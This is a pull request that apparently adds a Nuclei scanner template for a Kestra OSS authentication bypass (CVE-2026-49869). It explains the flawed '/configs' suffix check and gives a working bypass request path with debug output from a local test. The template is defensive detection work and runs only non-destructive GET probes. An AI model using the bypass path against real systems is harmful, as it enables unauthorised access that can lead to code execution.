### PR TITLE
Add CVE-2026-49869 template: Kestra OSS authentication bypass to RCE

### DIFF
--- a/http/cves/2026/CVE-2026-49869.yaml
+++ b/http/cves/2026/CVE-2026-49869.yaml
@@ -1,0 +1,84 @@
+id: CVE-2026-49869
+
+info:
+  name: Kestra OSS < 1.0.45 / 1.3.21 - Authentication Bypass to RCE
+  author: mohamed-bashir-dev,vasco0x4
+  severity: critical
+  description: |
+    Kestra OSS prior to 1.0.45 and 1.3.x prior to 1.3.21 contain an authentication bypass in the AuthenticationFilter. The filter whitelists the liveness endpoint by checking whether the request path ends with the literal segment /configs instead of exact-matching /api/v1/configs, so any authenticated API path ending in /configs is served without Basic authentication. An unauthenticated remote attacker can reach otherwise protected API routes, and because Kestra ships with workflow and script execution capabilities, this can be escalated to remote code execution. The vulnerability is known to be exploited in the wild (CISA KEV).
+  impact: |
+    Unauthenticated attackers can access protected API endpoints without credentials, enumerate and manipulate workflows, and ultimately execute arbitrary code on the Kestra server.
+  remediation: |
+    Upgrade Kestra OSS to version 1.0.45, 1.3.21, or later.
+  reference:
+    - https://github.com/kestra-io/kestra/security/advisories/GHSA-5vc5-wxxq-3fjx
+    - https://github.com/kestra-io/kestra/commit/f86137b2335659cfac764d9b0ea74eee3bd8ca18
+    - https://github.com/Ap0dexMe0/CVE-2026-49869
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-49869
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-49869
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: kestra
+    product: kestra
+    shodan-query: http.title:"Kestra"
+  tags: cve,cve2026,kestra,auth-bypass,rce,kev
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  # Fingerprint the target as a Kestra OSS instance and extract its version.
+  - raw:
+      - |
+        GET /api/v1/configs HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"version\":\"")'
+          - 'contains(body, "\"edition\":\"OSS\"")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        internal: true
+        regex:
+          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'
+
+  # Auth baseline: the flows API must reject unauthenticated requests (401),
+  # proving that Basic authentication is enforced on the instance.
+  - raw:
+      - |
+        GET /api/v1/main/flows HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 401'
+        internal: true
+
+  # Bypass: the path ends with the literal segment /configs, so the vulnerable
+  # filter skips authentication and serves the request instead of returning 401.
+  # A 200 means data was returned without credentials; a 404 carrying the API
+  # error JSON means the request reached the router/controller unauthenticated.
+  - raw:
+      - |
+        GET /api/v1/main/flows/system/configs HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || (status_code == 404 && contains(body, "\"message\""))'
+        condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2026-49869 — Kestra OSS authentication bypass (AuthenticationFilter `/configs` suffix check) leading to unauthenticated API access and RCE. **CISA KEV-listed**, GHSA-5vc5-wxxq-3fjx, CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), CWE-287.
- The `AuthenticationFilter` whitelisted the liveness endpoint via `request.getPath().endsWith("/configs")` instead of exact-matching `/api/v1/configs`, so any authenticated API path ending in the literal segment `/configs` is served without Basic auth. With default script plugins this escalates to unauthenticated RCE.
- Template logic (3 requests, all GET, non-destructive):
  1. `GET /api/v1/configs` (internal) — fingerprint Kestra OSS + extract version
  2. `GET /api/v1/main/flows` (internal) — require 401, proving Basic auth is enforced
  3. `GET /api/v1/main/flows/system/configs` — detection point: `200`, or `404` carrying the Kestra API JSON error body (both only occur when auth was bypassed; the patched filter returns 401 instead)
- References:
  - https://github.com/kestra-io/kestra/security/advisories/GHSA-5vc5-wxxq-3fjx
  - https://github.com/kestra-io/kestra/commit/f86137b2335659cfac764d9b0ea74eee3bd8ca18
  - https://nvd.nist.gov/vuln/detail/CVE-2026-49869
  - https://www.cisa.gov/known-exploited-vulnerabilities-catalog

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive) — official `kestra-1.0.44` standalone JAR, `server local` with Basic auth configured (unauthenticated `/api/v1/main/flows` → 401). `nuclei -u http://localhost:8080 -t http/cves/2026/CVE-2026-49869.yaml` → `[CVE-2026-49869:dsl-1] [http] [critical] http://localhost:8080/api/v1/main/flows/system/configs` (repeatable across runs)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive) — official `kestra-1.0.46` JAR, same config: 0 matches; debug shows requests 1–2 matched internally (200 fingerprint / 401 baseline) and request 3 correctly returned 401 on the bypass path

`nuclei -validate -t http/cves/2026/CVE-2026-49869.yaml` → All templates validated successfully.

Excerpt of `-debug` on the vulnerable instance (localhost, unauthenticated):

```
[DEBUG] [GET] /api/v1/configs → 200 {"version":"1.0.44","edition":"OSS",...}
[DEBUG] [GET] /api/v1/main/flows → 401
[DEBUG] [GET] /api/v1/main/flows/system/configs → 404 {"message":"Not Found",...}  ← reached the controller without credentials
[CVE-2026-49869:dsl-1] [http] [critical] http://localhost:8080/api/v1/main/flows/system/configs
```

Note: on a fresh empty install the bypass path returns a controller-served 404 JSON (flow id `configs` does not exist) rather than 200-with-data — the 404 JSON body itself proves the request reached the router unauthenticated, which is why the matcher accepts `200 || (404 && contains(body, "\"message\""))`. Full `-debug` transcripts for both instances available on request.

#### Additional Details (leave it blank if not applicable)

- Author credit: vulnerability discovered by Vasco0x4 (per GHSA), credited alongside the template author per the creation guide.
- Affected: Kestra OSS < 1.0.45, 1.3.x < 1.3.21 (fix commit f86137b changes the filter to exact-match `/api/v1/configs`).
- A public scanner exists (https://github.com/Ap0dexMe0/CVE-2026-49869); this template intentionally uses only safe GET probes — no flow creation, no execution, no cleanup state.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
